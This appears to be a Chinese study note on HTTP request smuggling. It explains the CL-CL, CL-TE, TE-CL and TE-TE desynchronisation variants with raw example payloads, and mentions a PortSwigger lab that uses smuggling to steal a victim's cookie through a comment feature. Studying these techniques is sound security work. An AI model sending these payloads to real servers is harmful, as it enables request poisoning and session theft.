成因

HTTP 1.1 两个特性 Keep-Alive & pipeline

一般此攻击主要存在于代理和后端之间

由于代理需要从后端获取大量信息、数据，且两者相对固定，所以持久化 TCP 连接是减少开销的同时加快访问速度的有效方案。
代理(客户端)可能同时存在大量请求，不可能等待服务器返回上一个后再请求下一个，利用管线化(先入先出)整批提交请求而不需要先等待服务器响应。
现在考虑：如果通过这两个特性，是不是存在数据包污染的可能性？

持久连接

在 HTTP 1.1 中所有的连接默认都是持续连接，除非特殊声明不支持。

管线化 pipeline

HTTP 管线化同时依赖于客户端和服务器的支持。遵守 HTTP/1.1 的服务器支持管线化。这并不是意味着服务器需要提供管线化的回复，而只是要求在收到管线化的请求时候不会失败。

类型

CL = Content-Length
TE = Transfer-Encoding

CL-CL

按照RFC7230规范文档，如果只包含两个CL须直接返回 400 错误
问题在于前后端假如没有严格遵守规范，且代理后端按 CL 顺序依次进行解析
如有如下数据包

POST / HTTP/1.1\r\n
Host: example.com\r\n
Content-Length: 6\r\n <- Frontend sees this
Content-Length: 5\r\n <- Backend sees this
\r\n
12345G

前端(代理)服务器获取到数据包长度为 6，将上述数据包完整转发给后端服务器
后端服务器获取数据包长度为 5，读取 5 个字符后将剩余内容放置在缓存区，认为G是下一个请求的部分内容
下一个包进入后端时，后端从缓存区读取内容，造成污染

GPOST / HTTP/1.1\r\n
Host: example.com

两个数据包整体效果

POST / HTTP/1.1\r\n
Host: example.com\r\n
Content-Length: 6\r\n       <- Frontend sees this
Content-Length: 5\r\n       <- Backend sees this
\r\n
12345GPOST / HTTP/1.1\r\n
Host: example.com

---

Response : Unknown method GPOST

CL-TE

前端处理 CL，后端处理 TE
TE 中最常用的当然是 chunk 分块传输编码

POST / HTTP/1.1\r\n
Host: example.com\r\n
Content-Length: 6\r\n           <- Frontend sees this
Transfer-Encoding: chunked\r\n  <- Backend sees this
\r\n
0\r\n
\r\n
GPOST / HTTP/1.1

---

Response : Unknown method GPOST

由于前段根据CL解析，得到以下请求

 0\r\n
 \r\n
 G

后端根据TE解析，认为0\r\n\r\n为结尾，后续内容属于下一个请求

TE-CL

前段处理 TE，后端处理 CL

POST / HTTP/1.1\r\n
Host: example.com\r\n
Content-Length: 3\r\n           <- Backend sees this
Transfer-Encoding: chunked\r\n  <- Frontend sees this
\r\n
6\r\n
PREFIX\r\n
0\r\n
\r\n

POST / HTTP/1.1\r\n
Host: example.com

TE-TE

这个问题主要是由于在双 TE 中，通过构造一个非法的 TE 头，导致前后端其中一个无法正常解析而选择忽略 TE 头选择 CL。所以实际为 TE-CL 或 CL-TE，特点在于数据包中会出现1CL & 2TE

POST / HTTP/1.1\r\n
Host: example.com\r\n
Content-length: 4\r\n
Transfer-Encoding: chunked\r\n
Transfer-Encoding: cow\r\n
\r\n
5c\r\n
GPOST / HTTP/1.1\r\n
Content-Type: application/x-www-form-urlencoded\r\n
Content-Length: 15\r\n
\r\n
x=1\r\n
0\r\n
\r\n

可以看到由于第二个 TE 无效，所以实际为 TE-CL

POST / HTTP/1.1\r\n
Host: example.com\r\n
Content-length: 4\r\n           <- Backend sees this second
Transfer-Encoding: chunked\r\n  <- Frontend sees this
Transfer-Encoding: cow\r\n      <- Backend sees this first and ignore
\r\n
5c\r\n
GPOST / HTTP/1.1\r\n
Content-Type: application/x-www-form-urlencoded\r\n
Content-Length: 15\r\n
\r\n
x=1\r\n
0\r\n
\r\n

前端通过 TE 解析，认为下面全部是有效数据

 5c\r\n
 GPOST / HTTP/1.1\r\n
 Content-Type: application/x-www-form-urlencoded\r\n
 Content-Length: 15\r\n
 \r\n
 x=1\r\n
 0\r\n
 \r\n

后端先通过 TE 解析，但 TE 值无效，忽略 TE 头选择 CL 再次进行解析，由于长度为 4 所以认为5c\r\n即为本次请求所有数据，剩下均为下次请求内容

坑：在使用Repeater测试的时候要将自动更新content-lenth关掉！

Portswigger的靶场

https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te
CL-TE模型
攻击请求，大致意思就是代替受害者发送前半部分的HTTP请求，接口的功能是发布评论，所以当受害者访问网站的第一个请求的HTTP包体会以评论的形式出现在攻击者的评论里面，从而可以达成Cookie的窃取。

Today is new

HTTP Smuggling笔记

成因